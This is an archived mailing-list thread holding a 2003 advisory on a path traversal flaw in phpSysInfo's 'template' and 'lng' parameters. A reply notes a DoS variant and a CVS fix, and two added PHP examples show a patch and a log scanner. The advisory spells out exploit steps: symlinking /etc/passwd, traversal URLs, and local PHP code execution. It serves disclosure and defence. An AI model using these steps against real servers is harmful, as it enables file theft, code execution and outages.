
View Full Version : Unauthorized reading files on phpSysInfo



Albert Puigsech Galicia
25/04/03, 19:05
/-----------------------------------------------------------------------------\
| 7 A 6 9 - A d v C: 007
|-----------------------------------------------------------------------------|
|
| [ Unauthorized reading files on phpSysInfo ]
|
\-----------------------------------------------------------------------------/
| 01/04/2003 |


Data.
-----

+ Type: To gain visibility.

+ Software: phpSysInfo.

+ Versions: until 2.1 (current version).

+ Exploit: Yes (but only local).

+ Author: Albert Puigsech Galicia

+ Contact: ripe@7a69ezine.org



Information.
------------

PhpSysInfo is a little PHP script intended to show system information.
It shows data like CPU or memory usage, disk usage, PCI, ethernet, and IDE
information, etc. Visit the project website at http://phpsysinfo.sourceforge.net
for more info.


Description.
------------

PhpSysInfo uses a template system based on the 'template' variable, and a
language system based on the 'lng' variable. These variables are used to complete
a file path without checking if they contain the '..' special directory, allowing
any file on the system to be read as the webserver user.


Exploiting.
-----------

Exploiting this vulnerability requires write access on a local
directory where the webserver can read files.

In the template case, phpSysInfo checks only if the template exists. To do
that, it only checks if 'templates/$template' exists.


---/ index.php /---

if (!((isset($template) && file_exists("templates/$template")) || $template == 'xml')) {
    // default template we should use if we don't get an argument.
    $template = 'classic';
}

---/ index.php /---


Exactly the same in the language selection system.


---/ index.php /---

if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
    $lng = 'en';
    // see if the browser knows the right language.
    if (isset($HTTP_ACCEPT_LANGUAGE)) {
        $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
        if (count($plng) > 0) {
            while (list($k, $v) = each($plng)) {
                $k = split(';', $v, 1);
                $k = split('-', $k[0]);
                if (file_exists('./includes/lang/' . $k[0] . '.php')) {
                    $lng = $k[0];
                    break;
                }
            }
        }
    }
}

---/ index.php /---

The 'template' variable will be used to load the files
'./templates/$template/form.tpl' and './templates/$template/box.tpl'
for template stuff, so it is necessary to create the symlinks to read
any file readable by the webserver.


local ~$ ln -s /etc/passwd /tmp/form.tpl
local ~$ ln -s /etc/passwd /tmp/box.tpl

http://vulnerable/index.php?template=../../../../tmp


The 'lng' variable is used in this piece of code:

---/ index.php /---

require('./includes/lang/' . $lng . '.php'); // get our language include

---/ index.php /---


It allows us, in the same way as 'template', to read a file on
the system.


local ~$ ln -s /etc/passwd /tmp/p.php

http://vulnerable/index.php?lng=../../../../tmp/p


But it also allows executing arbitrary PHP code, by creating the PHP
file first.


local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php

http://vulnerable/index.php?lng=../../../../tmp/p


The use of PHP's '.' operator to concatenate strings prevents a remote exploit of
this vulnerable PHP script, because we can't use %00 to end the string.


Patch.
------

There is no official patch, but it is easy to code one by adding some
regex to the code to filter '..' content in the 'template' and 'lng' variables.



--
>====================================
> Albert Puigsech Galicia (7a69)
>
> http://ripe.7a69ezine.org
>====================================
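One way to implement the fix the advisory's Patch section asks for, written as an added example rather than phpSysInfo's own code: the 'template' and 'lng' request values are accepted only if they pass an allowlist regex (so '..', '/', '\' and NUL never reach a path) and, independently, only if the file they select still resolves inside the intended directory after realpath(). The directory layout mirrors the paths quoted in the advisory; the function names and the throw-away demo tree are this example's own assumptions.

```php
<?php
// Added example (not phpSysInfo's code): strict selection of the language
// include and template directory. Two independent checks are applied:
//   1. an allowlist regex on the bare name (the regex filter the advisory
//      suggests, in allowlist rather than denylist form);
//   2. a realpath() containment check, so the resolved target must live
//      under the expected base directory even if a symlink points elsewhere.
// Function names and the demo directory layout are this example's own.

/** Accept only short, plain identifiers such as 'classic' or 'en'. */
function is_safe_name($name): bool
{
    return is_string($name) && preg_match('/^[A-Za-z0-9_-]{1,32}$/', $name) === 1;
}

/**
 * Resolve "$baseDir/$name$suffix" and return its canonical path, or null if
 * the name is malformed, the target does not exist, or it lies outside
 * $baseDir. realpath() follows symlinks, so a link planted inside the
 * directory that points outside it is rejected as well.
 */
function resolve_inside(string $baseDir, $name, string $suffix): ?string
{
    if (!is_safe_name($name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . $suffix);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

/** Pick the language include: the requested one if valid, otherwise 'en'. */
function select_language_file(string $langDir, $requested): ?string
{
    foreach ([$requested, 'en'] as $lng) {
        $file = resolve_inside($langDir, $lng, '.php');
        if ($file !== null) {
            return $file;
        }
    }
    return null;
}

/** Pick the template directory: the requested one if valid, otherwise 'classic'. */
function select_template_dir(string $tplDir, $requested): ?string
{
    foreach ([$requested, 'classic'] as $tpl) {
        $dir = resolve_inside($tplDir, $tpl, '');
        if ($dir !== null && is_dir($dir)) {
            return $dir;
        }
    }
    return null;
}

// --- Demo on a throw-away directory tree (constructed for this example) ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'psi_demo_' . getmypid();
mkdir("$root/includes/lang", 0700, true);
mkdir("$root/templates/classic", 0700, true);
file_put_contents("$root/includes/lang/en.php", "<?php // language strings\n");
file_put_contents("$root/templates/classic/box.tpl", "");
file_put_contents("$root/secret.txt", "outside the lang directory\n");
// A symlink inside the allowed directory that points outside it: the name
// 'evil' passes the regex, but realpath() exposes the real target.
symlink("$root/secret.txt", "$root/includes/lang/evil.php");

$inputs = ['en', '../../../../tmp/p', '../../index', "en\0", 'en/../en', 'evil', 'nonexistent'];
foreach ($inputs as $in) {
    $file = select_language_file("$root/includes/lang", $in);
    printf("lng=%-24s -> %s\n", json_encode($in), $file === null ? 'NONE' : basename($file));
}
foreach (['classic', '../../../../tmp'] as $in) {
    $dir = select_template_dir("$root/templates", $in);
    printf("template=%-19s -> %s\n", $in, $dir === null ? 'NONE' : basename($dir));
}

// Clean up the demo tree.
unlink("$root/includes/lang/evil.php");
unlink("$root/includes/lang/en.php");
unlink("$root/templates/classic/box.tpl");
unlink("$root/secret.txt");
rmdir("$root/templates/classic"); rmdir("$root/templates");
rmdir("$root/includes/lang"); rmdir("$root/includes"); rmdir($root);
```

Every abusive input in the demo falls back to 'en' or 'classic', exactly as the original code intended for a missing parameter; the difference is that the fallback now also triggers for names that exist on disk but resolve outside the directory, which a plain file_exists() check can never tell apart from a legitimate template.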

Wolter Kamphuis
26/04/03, 01:20
Hi,

In bug report #670222 I described the same problem and how to use it to
DoS the host. Calling "index.php?lng=../../index" creates a runaway
recursive loop, creating a huge load and finally crashing the
apache process. This can easily be used to DoS a webserver.
http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015

On 19 January my fix for this problem was incorporated in the CVS
repository. This also fixes the problems described in Albert Puigsech
Galicia's report.
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57

phpSysInfo 2.1 is vulnerable; the CVS versions after 19 January are not.

mzzl
Wolter Kamphuis
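For anyone who ran an unpatched phpSysInfo and wants to know whether it was probed, the following added example (not part of this thread or of phpSysInfo) scans combined-format access-log lines for requests that abuse the 'template' and 'lng' parameters, and separately marks the self-include form from the reply above, where 'lng' points back at index.php. The log lines are constructed for the demo and the helper names are this example's own.

```php
<?php
// Added example, not from the thread: detect traversal attempts against
// phpSysInfo's 'template' and 'lng' parameters in web-server access logs,
// and flag the 'lng=../../index' self-include pattern the reply describes.
// The sample log lines below are constructed; helper names are this example's own.

/** Return an array of findings (possibly empty) for one combined-format log line. */
function scan_log_line(string $line): array
{
    // client ident user [time] "METHOD target PROTOCOL" status ...
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return [];
    }
    $client = $m[1]; $time = $m[2]; $method = $m[3]; $target = $m[4]; $status = $m[5];
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    parse_str($query, $params);   // parse_str() already URL-decodes once
    $findings = [];
    foreach (['template', 'lng'] as $p) {
        if (!isset($params[$p]) || !is_string($params[$p])) {
            continue;
        }
        // Decode once more: double-encoded '..%252F' is a common filter evasion.
        $value = rawurldecode($params[$p]);
        $reason = null;
        if (preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $value)) {
            $reason = 'directory traversal';
        } elseif (strpos($value, "\0") !== false) {
            $reason = 'NUL byte';
        } elseif (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $value)) {
            $reason = 'unexpected characters';
        }
        if ($reason !== null && $p === 'lng' && preg_match('#(^|[\\\\/])index$#', $value)) {
            $reason .= ', self-include of index.php (DoS pattern)';
        }
        if ($reason !== null) {
            $findings[] = [
                'client' => $client, 'time' => $time, 'method' => $method,
                'status' => $status, 'param' => $p, 'value' => $value, 'reason' => $reason,
            ];
        }
    }
    return $findings;
}

// Constructed sample: one benign request followed by three abusive ones.
$sample = <<<'LOG'
10.0.0.5 - - [25/Apr/2003:19:05:12 +0200] "GET /sysinfo/index.php?template=classic&lng=en HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Apr/2003:19:06:01 +0200] "GET /sysinfo/index.php?template=../../../../tmp HTTP/1.1" 200 2210 "-" "curl/7.9"
10.0.0.9 - - [25/Apr/2003:19:06:40 +0200] "GET /sysinfo/index.php?lng=..%252F..%252F..%252F..%252Ftmp%252Fp HTTP/1.1" 200 1804 "-" "curl/7.9"
10.0.0.12 - - [26/Apr/2003:01:20:33 +0200] "GET /sysinfo/index.php?lng=../../index HTTP/1.1" 500 0 "-" "-"
LOG;

foreach (explode("\n", $sample) as $line) {
    foreach (scan_log_line($line) as $f) {
        printf("%s %-10s %s=%s -> %s (HTTP %s)\n",
            $f['time'], $f['client'], $f['param'], $f['value'], $f['reason'], $f['status']);
    }
}
```

The benign first line produces no finding; the other three are reported, and the last one carries the extra self-include marker. Because the scanner decodes the parameter twice, the double-encoded third request is caught as the same traversal as the second.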


